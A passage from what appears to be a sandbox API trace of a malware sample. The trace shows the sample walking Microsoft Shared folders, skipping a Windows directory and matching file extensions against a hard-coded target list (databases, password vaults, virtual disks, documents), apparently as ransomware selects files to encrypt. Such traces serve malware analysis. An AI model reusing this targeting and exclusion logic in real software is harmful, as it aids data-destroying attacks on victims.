Shared\\MSInfo", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*" [0040.027] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.027] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.027] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.027] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US" [0040.027] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned 0x0 [0040.027] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*" [0040.027] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.028] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.028] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.028] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US", pszFile="msinfo32.exe.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" [0040.028] PathFindExtensionW (pszPath="msinfo32.exe.mui") returned=".mui" [0040.028] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.028] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.028] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.028] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.028] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.028] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo", pszFile="msinfo32.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" [0040.028] PathFindExtensionW (pszPath="msinfo32.exe") returned=".exe" [0040.028] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0040.028] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0040.028] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.028] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.028] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.029] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="Stationery" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery" [0040.029] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned 0x0 [0040.029] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*" [0040.029] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.032] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.034] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.034] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Bears.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" [0040.034] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0040.034] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.035] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.035] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.035] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Bears.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" [0040.035] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0040.035] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.035] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.035] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.035] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Blue_Gradient.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" [0040.035] PathFindExtensionW (pszPath="Blue_Gradient.jpg") returned=".jpg" [0040.035] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.035] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.036] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.036] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Cave_Drawings.gif" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" [0040.036] PathFindExtensionW (pszPath="Cave_Drawings.gif") returned=".gif" [0040.036] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".gif.") returned 5 [0040.036] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".gif.") returned 0x0 [0040.036] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.036] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Connectivity.gif" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" [0040.036] PathFindExtensionW (pszPath="Connectivity.gif") returned=".gif" [0040.036] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".gif.") returned 5 [0040.036] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".gif.") returned 0x0 [0040.036] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.036] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Desktop.ini" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" [0040.037] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0040.037] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".ini.") returned 5 [0040.037] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ini.") returned 0x0 [0040.037] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.037] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Dotted_Lines.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" [0040.037] PathFindExtensionW (pszPath="Dotted_Lines.emf") returned=".emf" [0040.037] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.037] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.037] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.037] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Garden.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" [0040.037] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0040.037] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.037] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.038] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.038] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Garden.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" [0040.038] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0040.038] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.038] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.038] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.038] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Genko_1.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" [0040.039] PathFindExtensionW (pszPath="Genko_1.emf") returned=".emf" [0040.039] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.039] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.039] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.039] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Genko_2.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" [0040.039] PathFindExtensionW (pszPath="Genko_2.emf") returned=".emf" [0040.039] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.039] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.039] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.039] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Graph.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" [0040.039] PathFindExtensionW (pszPath="Graph.emf") returned=".emf" [0040.039] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.039] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.039] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.040] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Green Bubbles.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" [0040.040] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0040.040] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.040] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.040] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.040] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="GreenBubbles.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" [0040.040] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0040.040] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.040] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.040] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.040] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="grid_(cm).wmf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" [0040.040] PathFindExtensionW (pszPath="grid_(cm).wmf") returned=".wmf" [0040.040] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".wmf.") returned 5 [0040.040] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmf.") returned 0x0 [0040.040] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.040] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="grid_(inch).wmf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" [0040.040] PathFindExtensionW (pszPath="grid_(inch).wmf") returned=".wmf" [0040.040] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".wmf.") returned 5 [0040.040] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmf.") returned 0x0 [0040.041] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.041] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Hand Prints.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" [0040.041] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0040.041] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.041] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.041] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.041] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="HandPrints.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" [0040.041] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0040.041] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.041] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.041] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.041] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Memo.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" [0040.041] PathFindExtensionW (pszPath="Memo.emf") returned=".emf" [0040.041] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.041] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.041] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.041] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Monet.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" [0040.041] PathFindExtensionW (pszPath="Monet.jpg") returned=".jpg" [0040.041] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.041] StrStrIW 